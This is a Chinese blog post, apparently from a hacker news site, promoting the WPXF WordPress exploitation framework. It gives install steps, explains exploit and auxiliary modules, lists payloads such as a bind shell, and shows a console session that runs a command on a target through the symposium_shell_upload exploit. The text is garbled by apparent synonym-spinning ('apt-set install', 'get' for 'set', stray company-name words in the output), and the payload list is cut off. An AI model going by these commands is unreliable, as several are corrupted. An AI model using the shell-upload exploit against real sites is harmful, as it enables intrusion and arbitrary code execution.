一款强大的WordPress漏洞利用框架 – WPXF

一款强大的WordPress漏洞利用框架 – WPXF

黑客软件hacker2019-06-19 7:13:5010793A+A-

一款强大的WordPress漏洞利用框架 – WPXF 第1张

"今日给大伙儿详细介绍的专用工具是这款Ruby架构,该架构选用模块化设计开发设计,致力于协助安全性科学研究权威专家对应用场景WordPress的网址和系统软件开展渗透测试工作中。

专用工具免费下载:【GitHub首页 】

专用工具运作规定

保证你系统软件中安裝的Ruby版本号>=2.2.6,随后在终端设备指令对话框中转换到WPXF新项目所属文件目录,并运行命令“bundle install”来安裝和配备依靠自然环境。要是你一直在系统软件中没法寻找bundler得话,你能根据运行命令“gem install bundler”来安裝bundler。

安裝全过程中将会会碰到的难题

Debian系统软件

要是你一直在安裝WPXF的依靠自然环境时出现难题,最先你可以保证你的系统软件中早已安裝好啦全部用于编译Ruby的C拓展专用工具:

sudo apt-set install build-essential patch

当你发觉你的系统软件中缺乏关键的开发设计头文件,那么你能应用下边这方面指令来处理这一难题:

sudo apt-set install ruby-dev zlib1g-dev liblzma-dev

Windows系统软件

要是系统软件错误提示“libcurl.dll文档没法被载入”,那么你必须保证你的Ruby/bin文件夹名称下的libcurl编码是最新版的,或是查验环境变量的PATH自变量中别的的文件夹名称是不是合理。

最新版编码能够从【这儿】免费下载。免费下载进行以后,再将bin文件目录下的內容获取到本机Ruby/bin文件目录中。

专用工具的应用

开启1个终端设备对话框(terminal)并转换到你免费下载并储存WordPress Exploit Framework的新项目文件目录下,随后根据指令“ruby wpxf.rb”来运作它。

载入取得成功以后,你将会见到wpxf的命令提示符,你能这里应用“search”指令检索控制模块或应用“use”指令来载入控制模块。

如果你向自然环境中载入了1个控制模块以后,我也能够应用“get”指令来进行设定了,或是应用“info”指令查询相关控制模块的信息内容。

在下边这一演试样例中,我载入了1个全名是symposium_shell_upload的控制模块,随后在对控制模块和Payload开展了配备以后,刚开始对总体目标服务器执行进攻。

wpxf > use exploit/symposium_shell_upload

 

[+] Loaded module:#  

wpxf [exploit/symposium_shell_upload] > get hostwp-sandbox

 

[+] Set host => wp-sandbox

 

wpxf [exploit/symposium_shell_upload] > get target_uri/wordpress/

 

[+] Set target_uri => /wordpress/

 

wpxf [exploit/symposium_shell_upload] > get payload exec  

[+] Loaded payload: #  

wpxf [exploit/symposium_shell_upload] > get cmd echo""Hello, world!""  

[+] Set cmd => echo ""Hello, world!""  

wpxf [exploit/symposium_shell_upload] > run

 

[-] Preparing payload有限责任公司

[-] Uploading the payload有限责任公司

[-] Executing the payload有限责任公司

[+] Result: Hello, world!

[+] Execution finished successfully

要是你要知道WPXF全部适用的操纵指令,请参照【这一网页页面】。

auxiliary控制模块和exploit控制模块有什么不同?

auxiliary控制模块不容许客户立即运作payload,但它能够协助你从总体目标服务器中获取出基本信息,建立提权,或出示DoS进攻作用。

exploit控制模块规定客户特定1个对于总体目标服务器的payload,相对的payload紧接着会在总体目标服务器上运作,它将容许你一直在总体目标服务器上运作随意编码、获取统计数据、或创建远程控制连接(Shell)等等等等。

专用工具出示了什么payload?

1.    bind_Python:发送1个脚本制作,该脚本制作会关联1个独特的端口号,并容许WPXF与总体目标服务器创建1个远程控制Shell。 2.    cus


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 3条评论
  • 南殷奢欲2022-05-31 01:53:25
  • t cmd echo""Hello, world!""  [+] Set cmd => echo &quo
  • 馥妴邶谌2022-05-31 07:54:28
  • do apt-set install build-essential patch 当你发觉你的系统软件中缺乏关键的开发设计头文件,那么你能应用下边这方面指令来处理这一难题:sudo apt
  • 离鸢谜兔2022-05-31 02:50:30
  • bin文件夹名称下的libcurl编码是最新版的,或是查验环境变量的PATH自变量中别的的文件夹名称是不是合理。 最新版编码能够从【这儿】免费下载。免费下载进行以后,再将bin文件目录下的內容获取到本机Ruby/bin文件目录中。 专用工具的应用 开启1个终端设备对话框(termina

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理